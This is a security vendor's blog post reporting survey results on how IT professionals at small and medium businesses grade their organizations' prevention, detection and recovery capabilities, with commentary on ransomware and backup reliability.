We asked IT pros to grade their organizations on the three core aspects of security: prevention, detection, and recovery. See how you stack up.
Managing security in today's rapidly envolving threat environment is a complex task. Not only do organizations need to be able to prevent an increasingly volatile variety of attacks, they also need to ensure they have the tools and systems in place to quickly detect and recover from incidents when they do occur.
Finding the right balance between these three areas of focus can be difficult, especially when your time and budget is limited.
We recently surveyed IT managers and system admins at small and medium-sized businesses to find out which types of security efforts they're prioritizing most often, and how they'd grade their organizations' current capabilities. While responses varied, the majority reflected a need for improvement across the board.
Goal: Keep malicious software off your systems and avoid unauthorized access
Example solutions: Antivirus, firewalls, email filtering, whitelisting, patch management, security awareness training, etc.
Priority rank: #1
Out of the three major areas of focus (prevention, detection, and recovery), the majority of respondents placed the highest priority on prevention. If given additional budget, 51% said they would invest in prevention first.
One third of IT pros give their organization an 'F' in prevention. Tweet this
One big contributing factor for that douer outlook might be an over-reliance on outdated technology. The majority of the most common prevention solutions — antivirus, firewalls, etc. — attempt to identify and block malware by scanning static files. That's unfortunately a technique that many of today's modern attacks actively bypass, either by making slight alterations to malware code, or by exploiting legitimate tools and software (ex: Microsoft PowerShell) to infect systems without having to deliver a malicious file on disk.
As a result, organizations are getting infected even if they have traditional prevention software in place. According to a separate survey we conducted late last year, over half the organizations targeted by cyber attacks in 2016 fell victim to one or more of them.
Goal: Become aware of security incidents and suspicious activity as quickly as possible
Example solutions: Intrusion detection system (IDS), network monitoring tools, etc.
Priority rank: #2
Slightly more than a quarter of respondents said they would prioritize additional detection tools and resources over additional prevention solutions.
43% of IT pros gave their organizations failing grades for detection, but still see it as a lower priority than prevention.
Many of the IT pros that gave their organizations high marks for prevention also gave comparably high scores for detection, though slightly more did indicate there was major need for improvement.
Despite the need for more help in this area, respondents still listed prevention as a higher priority for future budget allocation. That may be partly attributable to the high barrier to entry for most detection and response solutions, which are typcially more complex and often require a prohibitve investment of time, money, staff, and resources to manage.
IT pros also point to the record rise in ransomware as a reason for shifting their focus to prevention from detection. Since ransomware attacks can encrypt files in a matter of minutes or even seconds, detecting and responding to the attack after the fact means it's too late. The damage is already done.
Goal: Make cleaning up and getting back to normal after an attack as quick and painless as possible
Example solutions: Backup, forensics, etc.
Priority rank: #3
Nearly half the respondents stated they would make recovery their third priority behind both prevention and detection. Why? Because the majority feel like they've got this bucket covered.
4 out of 5 IT pros gave their organizations passing grades for recovery. Tweet this
While the grades for prevention and detection were mixed, it's clear that most IT pros feel they've got recovery nailed. Not only did 83 percent give their organizations passing grades, nearly 50 percent gave themselves an 'A' — twice the number of 'A's handed out for prevention and detection.
Why such a big difference? The answer may lie in confidence in backup solutions. According to a separate survey Barkly conducted, 81 percent of IT pros were confident restoring from backup would provide complete recovery from a ransomware attack. Unfortunately, when we followed up with respondents who had actually suffered ransomware attacks, less than half reported they were able to recover all their data successfully.
Backups are never fail-proof. It's easy to rest assured you'll be covered when you need them most, but unless you're actively testing them, that's really just wishful thinking. Learn how to establish a reliable backup strategy here.
Mixing It All Together for Balanced Security
Prevention, detection, and recovery are all important bases to cover. How did the respondents grade their organizations in terms of finding the right balance between all three?
40% of IT pros give their organization a failing grade for having a balanced security stack. Tweet this
They may feel like they're covered in terms of incident recovery, but until they improve on the prevention and detection fronts, many IT pros believe their security stacks still need work.
The key to doing that effectively is something Barkly co-founder and CTO Jack Danahy has written about extensively.
His #1 rule: Don't further exacerbate the problem by adding shelfware.
"Security products are the treadmills of IT. Before you rush into buying another one, ask yourself, how can I revisit our existing tools, identify where our gaps are, and determine how to mitigate the most serious threats to our most vulnerable and valuable resources?" Tweet this
Finding the right balance takes work up front, but taking the time to grade yourself as these IT pros did can help you identify which areas you prioritize and improve in most.
Quick wins for improving your security in 2017 — no new budget required
Whether you already have changes planned for your security stack or not, there are plenty of things you can be doing to better secure your organization. Make sure you have your bases covered with a free copy of our Open Source Cybersecurity Playbook and 2017 Cybersecurity Checklist.
Feature photo by Nicolas Raymond